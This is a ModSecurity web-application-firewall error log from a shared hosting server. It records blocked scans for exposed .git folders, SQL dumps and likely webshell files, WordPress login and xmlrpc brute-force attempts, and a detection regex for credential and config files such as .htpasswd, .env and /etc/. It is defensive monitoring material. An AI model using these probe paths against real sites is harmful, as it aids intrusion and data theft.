[Tue May 26 18:36:41.435876 2026] [security2:error] [pid 1015481:tid 1015671] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa4bQIKfWDMlp2INc-_gAAAUY"]
[Tue May 26 18:36:41.543040 2026] [security2:error] [pid 1015481:tid 1015724] [client 98.159.226.60:57023] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "worldwidecourier.co.in"] [uri "/.git/HEAD"] [unique_id "ahWa4bQIKfWDMlp2INc_CgAAAXs"]
[Tue May 26 18:36:41.980310 2026] [security2:error] [pid 1015481:tid 1015662] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa4bQIKfWDMlp2INc_EQABPRs"]
[Tue May 26 18:36:42.292860 2026] [security2:error] [pid 1015481:tid 1015693] [client 74.249.212.138:13233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/test11.php"] [unique_id "ahWa4rQIKfWDMlp2INc_HgAAAVw"]
[Tue May 26 18:36:42.292988 2026] [security2:error] [pid 1015481:tid 1015693] [client 74.249.212.138:13233] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/test11.php"] [unique_id "ahWa4rQIKfWDMlp2INc_HgAAAVw"]
[Tue May 26 18:36:42.343682 2026] [security2:error] [pid 1015481:tid 1015514] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWa4rQIKfWDMlp2INc_GAABWiA"]
[Tue May 26 18:36:42.343907 2026] [security2:error] [pid 1015481:tid 1015691] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWa4rQIKfWDMlp2INc_GAABWiA"]
[Tue May 26 18:36:42.388750 2026] [security2:error] [pid 1015481:tid 1015616] [client 98.159.226.60:31095] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/.git/HEAD"] [unique_id "ahWa4rQIKfWDMlp2INc_HwAAAQ8"]
[Tue May 26 18:36:42.422125 2026] [security2:error] [pid 1015481:tid 1015519] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/database.sql"] [unique_id "ahWa4rQIKfWDMlp2INc_IAABbyU"]
[Tue May 26 18:36:42.788422 2026] [security2:error] [pid 1015481:tid 1015515] [remote 121.200.216.55:60590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWa4rQIKfWDMlp2INc_JAABCyE"]
[Tue May 26 18:36:43.111371 2026] [security2:error] [pid 1015481:tid 1015719] [client 98.159.226.56:45131] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/.git/HEAD"] [unique_id "ahWa47QIKfWDMlp2INc_LQAAAXY"]
[Tue May 26 18:36:43.207168 2026] [security2:error] [pid 1015481:tid 1015528] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/dump.sql"] [unique_id "ahWa47QIKfWDMlp2INc_LgABGi4"]
[Tue May 26 18:36:43.238862 2026] [security2:error] [pid 1015481:tid 1015517] [remote 46.20.146.46:49658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWa47QIKfWDMlp2INc_KQABgyM"]
[Tue May 26 18:36:43.653556 2026] [security2:error] [pid 1015481:tid 1015642] [client 74.249.212.138:13212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/koala.php"] [unique_id "ahWa47QIKfWDMlp2INc_PQAAASk"]
[Tue May 26 18:36:43.653699 2026] [security2:error] [pid 1015481:tid 1015642] [client 74.249.212.138:13212] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/koala.php"] [unique_id "ahWa47QIKfWDMlp2INc_PQAAASk"]
[Tue May 26 18:36:43.676189 2026] [security2:error] [pid 1015481:tid 1015636] [client 98.159.226.60:52129] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.divinternationalcourier.in.onesoft.in"] [uri "/.git/HEAD"] [unique_id "ahWa47QIKfWDMlp2INc_PgAAASM"]
[Tue May 26 18:36:44.042388 2026] [security2:error] [pid 1015481:tid 1015711] [client 74.249.212.138:1286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/mac.php"] [unique_id "ahWa5LQIKfWDMlp2INc_RgAAAW4"]
[Tue May 26 18:36:44.042525 2026] [security2:error] [pid 1015481:tid 1015711] [client 74.249.212.138:1286] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/mac.php"] [unique_id "ahWa5LQIKfWDMlp2INc_RgAAAW4"]
[Tue May 26 18:36:44.119322 2026] [security2:error] [pid 1015481:tid 1015645] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa47QIKfWDMlp2INc_QQAAASw"]
[Tue May 26 18:36:44.136889 2026] [security2:error] [pid 1015481:tid 1015639] [client 98.159.226.60:45153] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.landsonlogistics.com"] [uri "/.git/HEAD"] [unique_id "ahWa5LQIKfWDMlp2INc_SgAAASY"]
[Tue May 26 18:36:44.147541 2026] [security2:error] [pid 1015481:tid 1015525] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/backup.sql"] [unique_id "ahWa5LQIKfWDMlp2INc_SwABeys"]
[Tue May 26 18:36:44.759727 2026] [security2:error] [pid 1015481:tid 1015648] [client 202.76.135.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa5LQIKfWDMlp2INc_UQAAAS8"]
[Tue May 26 18:36:45.377190 2026] [security2:error] [pid 1015481:tid 1015543] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/db.sql"] [unique_id "ahWa5bQIKfWDMlp2INc_XwABDz0"]
[Tue May 26 18:36:45.774103 2026] [security2:error] [pid 1015481:tid 1015716] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa5bQIKfWDMlp2INc_ZwAAAXM"]
[Tue May 26 18:36:46.269101 2026] [security2:error] [pid 1015481:tid 1015627] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa5rQIKfWDMlp2INc_cwAAARo"]
[Tue May 26 18:36:46.618433 2026] [security2:error] [pid 1015481:tid 1015632] [client 74.249.212.138:1607] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/25d653587fdfd1.php"] [unique_id "ahWa5rQIKfWDMlp2INc_gQAAAR8"]
[Tue May 26 18:36:46.618576 2026] [security2:error] [pid 1015481:tid 1015632] [client 74.249.212.138:1607] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/25d653587fdfd1.php"] [unique_id "ahWa5rQIKfWDMlp2INc_gQAAAR8"]
[Tue May 26 18:36:46.792151 2026] [security2:error] [pid 1015481:tid 1015710] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa5rQIKfWDMlp2INc_fAAAAW0"]
[Tue May 26 18:36:47.109060 2026] [security2:error] [pid 1015481:tid 1015539] [remote 216.73.216.30:13118] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/crm"] [unique_id "ahWa57QIKfWDMlp2INc_jgABdzk"]
[Tue May 26 18:36:47.405011 2026] [security2:error] [pid 1015481:tid 1015653] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa57QIKfWDMlp2INc_lAAAATQ"]
[Tue May 26 18:36:47.529964 2026] [security2:error] [pid 1015481:tid 1015737] [client 74.249.212.138:1337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/wefile.php"] [unique_id "ahWa57QIKfWDMlp2INc_mAAAAYg"]
[Tue May 26 18:36:47.530086 2026] [security2:error] [pid 1015481:tid 1015737] [client 74.249.212.138:1337] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/wefile.php"] [unique_id "ahWa57QIKfWDMlp2INc_mAAAAYg"]
[Tue May 26 18:36:47.749720 2026] [security2:error] [pid 1015481:tid 1015729] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa57QIKfWDMlp2INc_mwAAAYA"]
[Tue May 26 18:36:47.832772 2026] [security2:error] [pid 1015481:tid 1015738] [client 124.43.5.103:20669] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWa57QIKfWDMlp2INc_nAAAAYk"]
[Tue May 26 18:36:47.832978 2026] [security2:error] [pid 1015481:tid 1015738] [client 124.43.5.103:20669] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWa57QIKfWDMlp2INc_nAAAAYk"]
[Tue May 26 18:36:48.195662 2026] [security2:error] [pid 1015481:tid 1015735] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa6LQIKfWDMlp2INc_oAABhjs"]
[Tue May 26 18:36:48.643653 2026] [security2:error] [pid 1015481:tid 1015637] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa6LQIKfWDMlp2INc_rAAAASQ"]
[Tue May 26 18:36:49.547028 2026] [security2:error] [pid 1015481:tid 1015552] [remote 45.131.138.154:40483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 154.138.131.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWa6bQIKfWDMlp2INc_uAABWUY"]
[Tue May 26 18:36:49.761581 2026] [security2:error] [pid 1015481:tid 1015635] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa6bQIKfWDMlp2INc_uwAAASI"]
[Tue May 26 18:36:49.781047 2026] [security2:error] [pid 1015481:tid 1015676] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa6bQIKfWDMlp2INc_xAABS0o"]
[Tue May 26 18:36:50.052653 2026] [security2:error] [pid 1015481:tid 1015560] [remote 45.131.138.154:40483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 154.138.131.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWa6bQIKfWDMlp2INc_ygABL04"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 18:36:50.238308 2026] [security2:error] [pid 1015481:tid 1015726] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa6rQIKfWDMlp2INc_1AAAAX0"]
[Tue May 26 18:36:50.406892 2026] [security2:error] [pid 1015481:tid 1015620] [client 98.159.226.61:30619] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.sevenstar.onesoft.in"] [uri "/.git/HEAD"] [unique_id "ahWa6rQIKfWDMlp2INc_2AAAARM"]
[Tue May 26 18:36:50.670871 2026] [security2:error] [pid 1015481:tid 1015668] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa6rQIKfWDMlp2INc_4gAAAUM"]
[Tue May 26 18:36:50.704469 2026] [security2:error] [pid 1015481:tid 1015558] [remote 138.197.219.126:43758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 126.219.197.138.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWa6rQIKfWDMlp2INc_2QABT0w"]
[Tue May 26 18:36:50.786588 2026] [security2:error] [pid 1015481:tid 1015656] [client 74.249.212.138:12110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/casp3.php"] [unique_id "ahWa6rQIKfWDMlp2INc_5gAAATc"]
[Tue May 26 18:36:50.786718 2026] [security2:error] [pid 1015481:tid 1015656] [client 74.249.212.138:12110] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/casp3.php"] [unique_id "ahWa6rQIKfWDMlp2INc_5gAAATc"]
[Tue May 26 18:36:51.157664 2026] [security2:error] [pid 1015481:tid 1015723] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa67QIKfWDMlp2INc_7QAAAXo"]
[Tue May 26 18:36:51.163363 2026] [security2:error] [pid 1015481:tid 1015678] [client 98.159.226.63:57089] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.singhcouriercargo.com.onesoft.in"] [uri "/.git/HEAD"] [unique_id "ahWa67QIKfWDMlp2INc_9AAAAU0"]
[Tue May 26 18:36:51.732305 2026] [security2:error] [pid 1015481:tid 1015619] [client 98.159.226.61:33399] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.worldwidecourier.co.in.onesoft.in"] [uri "/.git/HEAD"] [unique_id "ahWa67QIKfWDMlp2INc_-wAAARI"]
[Tue May 26 18:36:52.306955 2026] [security2:error] [pid 1015481:tid 1015720] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa67QIKfWDMlp2INc__gAAAXc"]
[Tue May 26 18:36:52.559135 2026] [security2:error] [pid 1015481:tid 1015672] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa7LQIKfWDMlp2INdADgAAAUc"]
[Tue May 26 18:36:52.859870 2026] [security2:error] [pid 1015481:tid 1015568] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWa7LQIKfWDMlp2INdAGAABU1Y"]
[Tue May 26 18:36:52.859999 2026] [security2:error] [pid 1015481:tid 1015684] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWa7LQIKfWDMlp2INdAGAABU1Y"]
[Tue May 26 18:36:52.907244 2026] [security2:error] [pid 1015481:tid 1015620] [client 74.249.212.138:20853] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/wp-includes/blocks/post-comments-form/"] [unique_id "ahWa7LQIKfWDMlp2INdAGQAAARM"]
[Tue May 26 18:36:52.956463 2026] [security2:error] [pid 1015481:tid 1015708] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa7LQIKfWDMlp2INdAGgABa1o"]
[Tue May 26 18:36:53.397180 2026] [security2:error] [pid 1015481:tid 1015703] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa7bQIKfWDMlp2INdAJgABZl8"]
[Tue May 26 18:36:53.776713 2026] [security2:error] [pid 1015481:tid 1015660] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa7bQIKfWDMlp2INdALQABO10"]
[Tue May 26 18:36:54.208372 2026] [security2:error] [pid 1015481:tid 1015650] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa7rQIKfWDMlp2INdAMQABMV4"]
[Tue May 26 18:36:54.622058 2026] [security2:error] [pid 1015481:tid 1015641] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa7rQIKfWDMlp2INdAPQAAASg"]
[Tue May 26 18:36:54.787215 2026] [security2:error] [pid 1015481:tid 1015582] [remote 162.240.52.198:45448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWa7rQIKfWDMlp2INdAPgABJmQ"]
[Tue May 26 18:36:54.933177 2026] [security2:error] [pid 1015481:tid 1015583] [remote 162.240.52.198:45448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWa7rQIKfWDMlp2INdASAABeGU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:36:55.007312 2026] [security2:error] [pid 1015481:tid 1015667] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa7rQIKfWDMlp2INdASQABQmY"]
